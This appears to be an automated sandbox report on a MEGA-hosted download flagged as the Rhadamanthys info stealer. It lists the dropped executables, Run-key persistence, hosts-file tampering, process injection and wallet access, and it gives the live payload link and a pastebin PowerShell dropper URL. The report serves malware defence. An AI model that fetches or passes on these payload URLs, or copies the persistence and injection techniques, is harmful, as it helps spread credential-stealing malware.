rhadamanthys | hxxps://mega[.]nz/file/RpVGkD5Y#9SexJIhEtARB9-ruI9EPJx4a0wRJdb7sxe9VpVcSf-0

Analysis

max time kernel
237s
max time network
220s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
25-06-2024 21:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/RpVGkD5Y#9SexJIhEtARB9-ruI9EPJx4a0wRJdb7sxe9VpVcSf-0

Score

10^/10

rhadamanthys execution persistence spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/p2s7tDSd

Signatures

Detect rhadamanthys stealer shellcode 9 IoCs

Processes:

resource	yara_rule
behavioral1/memory/116-254-0x0000000002E10000-0x0000000003210000-memory.dmp	family_rhadamanthys
behavioral1/memory/116-256-0x0000000002E10000-0x0000000003210000-memory.dmp	family_rhadamanthys
behavioral1/memory/116-257-0x0000000002E10000-0x0000000003210000-memory.dmp	family_rhadamanthys
behavioral1/memory/116-259-0x0000000002E10000-0x0000000003210000-memory.dmp	family_rhadamanthys
behavioral1/memory/1512-412-0x0000000002ED0000-0x00000000032D0000-memory.dmp	family_rhadamanthys
behavioral1/memory/2884-533-0x0000000002F60000-0x0000000003360000-memory.dmp	family_rhadamanthys
behavioral1/memory/5008-540-0x00000000025A0000-0x00000000029A0000-memory.dmp	family_rhadamanthys
behavioral1/memory/4064-544-0x0000000002BE0000-0x0000000002FE0000-memory.dmp	family_rhadamanthys
behavioral1/memory/2480-654-0x0000000002870000-0x0000000002C70000-memory.dmp	family_rhadamanthys

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

93 5000 powershell.exe
170 4028 powershell.exe
239 2204 powershell.exe
311 4964 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

relog.exe

description ioc process

File opened for modification C:\Windows\System32\drivers\etc\hosts relog.exe

flow	pid	process
93	5000	powershell.exe
170	4028	powershell.exe
239	2204	powershell.exe
311	4964	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	relog.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

blackCC.exeblackCC.exeS500RAT.exeblackCC.exeblackCC.exeS500RAT.exeS500RAT.exeS500RAT.exeS500RAT.exeS500RAT.exeS500RAT.exeS500RAT.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	blackCC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	blackCC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	blackCC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	blackCC.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation	S500RAT.exe

Executes dropped EXE 24 IoCs

Processes:

w00ieq6n.exerelog.exeS500RAT.exeS500RAT.exeClient.exeblackCC.exew00ieq6n.exerelog.exeS500RAT.exeS500RAT.exeClient.exeblackCC.exew00ieq6n.exerelog.exeS500RAT.exeS500RAT.exeClient.exeblackCC.exew00ieq6n.exerelog.exeS500RAT.exeS500RAT.exeClient.exeblackCC.exe

pid	process
1164	w00ieq6n.exe
4364	relog.exe
1956	S500RAT.exe
1492	S500RAT.exe
4472	Client.exe
5032	blackCC.exe
2428	w00ieq6n.exe
3440	relog.exe
2364	S500RAT.exe
3308	S500RAT.exe
2016	Client.exe
1384	blackCC.exe
2016	w00ieq6n.exe
4936	relog.exe
2008	S500RAT.exe
3472	S500RAT.exe
892	Client.exe
4664	blackCC.exe
3088	w00ieq6n.exe
2016	relog.exe
3232	S500RAT.exe
5092	S500RAT.exe
2736	Client.exe
3892	blackCC.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

w00ieq6n.exerelog.exew00ieq6n.exerelog.exew00ieq6n.exerelog.exew00ieq6n.exerelog.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6771v1ai	w00ieq6n.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6771v1ai	relog.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mc77iv47	w00ieq6n.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mc77iv47	relog.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\l700402m = "C:\\Users\\Admin\\AppData\\Local\\Systemservices\\winserv.exe"	w00ieq6n.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\v26364za	relog.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4kx0yh1d	w00ieq6n.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4kx0yh1d	relog.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service
T1102

Processes:

flow ioc

170 pastebin.com
239 pastebin.com
311 pastebin.com
92 pastebin.com
93 pastebin.com

flow	ioc
170	pastebin.com
239	pastebin.com
311	pastebin.com
92	pastebin.com
93	pastebin.com

Suspicious use of SetThreadContext 19 IoCs

Processes:

crack.exew00ieq6n.exerelog.exeClient.exew00ieq6n.exerelog.exeClient.execrack.execrack.exew00ieq6n.exerelog.exeClient.execrack.execrack.execrack.execrack.exew00ieq6n.exerelog.exeClient.exe

description	pid	process	target process
PID 3392 set thread context of 116	3392	crack.exe	AppLaunch.exe
PID 1164 set thread context of 4364	1164	w00ieq6n.exe	relog.exe
PID 4364 set thread context of 2952	4364	relog.exe	relog.exe
PID 4472 set thread context of 1512	4472	Client.exe	AppLaunch.exe
PID 2428 set thread context of 3440	2428	w00ieq6n.exe	relog.exe
PID 3440 set thread context of 2404	3440	relog.exe	relog.exe
PID 2016 set thread context of 2884	2016	Client.exe	AppLaunch.exe
PID 1396 set thread context of 5008	1396	crack.exe	AppLaunch.exe
PID 1132 set thread context of 4064	1132	crack.exe	AppLaunch.exe
PID 2016 set thread context of 4936	2016	w00ieq6n.exe	relog.exe
PID 4936 set thread context of 2232	4936	relog.exe	relog.exe
PID 892 set thread context of 2480	892	Client.exe	AppLaunch.exe
PID 1388 set thread context of 1160	1388	crack.exe	AppLaunch.exe
PID 3784 set thread context of 4404	3784	crack.exe	AppLaunch.exe
PID 4076 set thread context of 3768	4076	crack.exe	AppLaunch.exe
PID 1260 set thread context of 3024	1260	crack.exe	AppLaunch.exe
PID 3088 set thread context of 2016	3088	w00ieq6n.exe	relog.exe
PID 2016 set thread context of 3716	2016	relog.exe	relog.exe
PID 2736 set thread context of 1096	2736	Client.exe	AppLaunch.exe

Drops file in Windows directory 4 IoCs

Processes:

S500RAT.exeS500RAT.exeS500RAT.exeS500RAT.exe

description	ioc	process
File created	C:\Windows\S500RAT.exe	S500RAT.exe
File opened for modification	C:\Windows\S500RAT.exe	S500RAT.exe
File opened for modification	C:\Windows\S500RAT.exe	S500RAT.exe
File opened for modification	C:\Windows\S500RAT.exe	S500RAT.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

4480 powershell.exe
5000 powershell.exe
468 powershell.exe
4028 powershell.exe
3972 powershell.exe
2204 powershell.exe
2132 powershell.exe
4964 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4480	powershell.exe
5000	powershell.exe
468	powershell.exe
4028	powershell.exe
3972	powershell.exe
2204	powershell.exe
2132	powershell.exe
4964	powershell.exe

Program crash 21 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2992	3392	WerFault.exe	crack.exe
812	4472	WerFault.exe	Client.exe
4376	1512	WerFault.exe	AppLaunch.exe
4468	2016	WerFault.exe	Client.exe
3304	1396	WerFault.exe	crack.exe
3140	2884	WerFault.exe	AppLaunch.exe
4612	1132	WerFault.exe	crack.exe
1432	5008	WerFault.exe	AppLaunch.exe
3696	4064	WerFault.exe	AppLaunch.exe
880	892	WerFault.exe	Client.exe
4860	2480	WerFault.exe	AppLaunch.exe
180	1388	WerFault.exe	crack.exe
4640	3784	WerFault.exe	crack.exe
4244	1160	WerFault.exe	AppLaunch.exe
4636	4404	WerFault.exe	AppLaunch.exe
880	4076	WerFault.exe	crack.exe
2600	3768	WerFault.exe	AppLaunch.exe
4292	1260	WerFault.exe	crack.exe
3872	3024	WerFault.exe	AppLaunch.exe
1064	2736	WerFault.exe	Client.exe
4492	1096	WerFault.exe	AppLaunch.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

AppLaunch.exetaskmgr.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	AppLaunch.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638234253644595"	chrome.exe

Modifies registry class 2 IoCs

Processes:

chrome.exetaskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exeAppLaunch.exepowershell.exepowershell.exetaskmgr.exerelog.exeAppLaunch.exepowershell.exepowershell.exerelog.exe

pid	process
1504	chrome.exe
1504	chrome.exe
116	AppLaunch.exe
116	AppLaunch.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
4444	taskmgr.exe
4444	taskmgr.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4364	relog.exe
4444	taskmgr.exe
4444	taskmgr.exe
1512	AppLaunch.exe
1512	AppLaunch.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
468	powershell.exe
4444	taskmgr.exe
468	powershell.exe
4444	taskmgr.exe
4444	taskmgr.exe
4028	powershell.exe
4028	powershell.exe
4028	powershell.exe
4444	taskmgr.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
3440	relog.exe
4444	taskmgr.exe
4444	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

4444 taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

1504 chrome.exe
1504 chrome.exe

pid	process
4444	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe
Token: SeShutdownPrivilege	1504	chrome.exe
Token: SeCreatePagefilePrivilege	1504	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
1504	chrome.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe
4444	taskmgr.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

S500RAT.exew00ieq6n.exeS500RAT.exew00ieq6n.exeS500RAT.exew00ieq6n.exeS500RAT.exew00ieq6n.exe

pid process

4028 S500RAT.exe
1164 w00ieq6n.exe
5088 S500RAT.exe
2428 w00ieq6n.exe
4076 S500RAT.exe
2016 w00ieq6n.exe
1992 S500RAT.exe
3088 w00ieq6n.exe

pid	process
4028	S500RAT.exe
1164	w00ieq6n.exe
5088	S500RAT.exe
2428	w00ieq6n.exe
4076	S500RAT.exe
2016	w00ieq6n.exe
1992	S500RAT.exe
3088	w00ieq6n.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1504 wrote to memory of 1976	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 1976	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 2016	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3216	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3216	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe
PID 1504 wrote to memory of 3924	1504	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/RpVGkD5Y#9SexJIhEtARB9-ruI9EPJx4a0wRJdb7sxe9VpVcSf-0
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdcbc2ab58,0x7ffdcbc2ab68,0x7ffdcbc2ab78
2⤵
PID:1976

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1580 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:2
2⤵
PID:2016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1900,i,15704487358648870758,3768290661746675541,131072 /prefetch:8
2⤵
PID:3216

C:\Program Files\Google\Chrome\Application\chrome.exe
